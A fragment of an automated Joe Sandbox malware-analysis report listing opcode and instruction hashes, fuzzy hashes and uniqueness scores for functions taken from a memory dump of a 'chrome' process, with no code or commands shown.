                                                                              • Instruction ID: 4f0fdb94954cceea9b88bcf7d9dfdca754aaf762e5ccc5e4058388e38c472fbf
                                                                              • Opcode Fuzzy Hash: 8d40a3b1089be040d8e9ef4c079c0916c4e6d06ab011389ac19a4314d66d52cd
                                                                              • Instruction Fuzzy Hash: 3C31367521124EEFC705EF78F9A98A53BB1FB5420C300896AD4848733DDB36294ADBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000013.00000002.80407135783.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_19_2_13c0000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5f730b97412461f01fe7d2e456d8cca8251c5d5525e8821934b520a905ef962c
                                                                              • Instruction ID: 2070aab41e53b19928d62423998571beeb3cbdbab1e92f2fcd903f6c4298112b
                                                                              • Opcode Fuzzy Hash: 5f730b97412461f01fe7d2e456d8cca8251c5d5525e8821934b520a905ef962c
                                                                              • Instruction Fuzzy Hash: BF21CF30E05208DFCB48DFB8D4192AEBFB1EF89304F1185A9D549DB681DB344E08C781
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000013.00000002.80407135783.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_19_2_13c0000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f75df183fdffabb59c91d60dc8c6729e79b43b8d254cc4c405739dd5d9d5f4c7
                                                                              • Instruction ID: e88e51cb3ff7386b02699507b07c2159f1972973db2f1add95474d14985ad6ab
                                                                              • Opcode Fuzzy Hash: f75df183fdffabb59c91d60dc8c6729e79b43b8d254cc4c405739dd5d9d5f4c7
                                                                              • Instruction Fuzzy Hash: FF31287521024EEFC705FF78F9A98A537B5FB5460C340892AD4848733DDB32694ADB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000013.00000002.80407135783.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_19_2_13c0000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 38467bfae592087c45f154f909cc93e51c3fb12764b8f5f40fb2664f2489b5f1
                                                                              • Instruction ID: 871d5ad98825d13b742a8997c24f6b6c1d660d2e5343a1dce80b6dcd3af4220b
                                                                              • Opcode Fuzzy Hash: 38467bfae592087c45f154f909cc93e51c3fb12764b8f5f40fb2664f2489b5f1
                                                                              • Instruction Fuzzy Hash: C7119374600219EFCB64EF78E46C46E7BB1F78861871146A9D40AC7349EB315C02CBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000013.00000002.80407135783.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_19_2_13c0000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 87c68d9b3f0ecb4495557c9b001a35d189e71bac4d3d77222d16fdb4b6c09acb
                                                                              • Instruction ID: 2d87bc31cfe3d9f7233371c06c53ae8c2665d6303408922ca412ab56956869f3
                                                                              • Opcode Fuzzy Hash: 87c68d9b3f0ecb4495557c9b001a35d189e71bac4d3d77222d16fdb4b6c09acb
                                                                              • Instruction Fuzzy Hash: C6110670E0022ADFCF44DFA8D4086EEBBF5FF49304F1181AAD455A7251DB394A41CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000013.00000002.80407135783.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_19_2_13c0000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 99b888c3a9510e985cdf223596f99fae30b27ed2e1095f1ffe143e6e6f214f91
                                                                              • Instruction ID: 0cb084150c859fec1a1b7f5a06e853d0d0ab401d5f69c3bb5f04d8fe4217a19b
                                                                              • Opcode Fuzzy Hash: 99b888c3a9510e985cdf223596f99fae30b27ed2e1095f1ffe143e6e6f214f91
                                                                              • Instruction Fuzzy Hash: DCF05C76504289CFC314DBBCF4790503F64F71164834041CFD4C5CB23AD61AD906CB51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000013.00000002.80407135783.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_19_2_13c0000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: dfda39e0a8b340a99afb6e7180bfe5f31a9b1e139db07f66e66dae9fd0a84292
                                                                              • Instruction ID: 5993c43e5309cb3ed0460a2d1d52a8292832f635380f12a13a0ecb5c40007403
                                                                              • Opcode Fuzzy Hash: dfda39e0a8b340a99afb6e7180bfe5f31a9b1e139db07f66e66dae9fd0a84292
                                                                              • Instruction Fuzzy Hash: 1FE02C30A083844FCB22CBB488280EEBFF08F972003008CDFC8C6C7202EE340A058B12
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%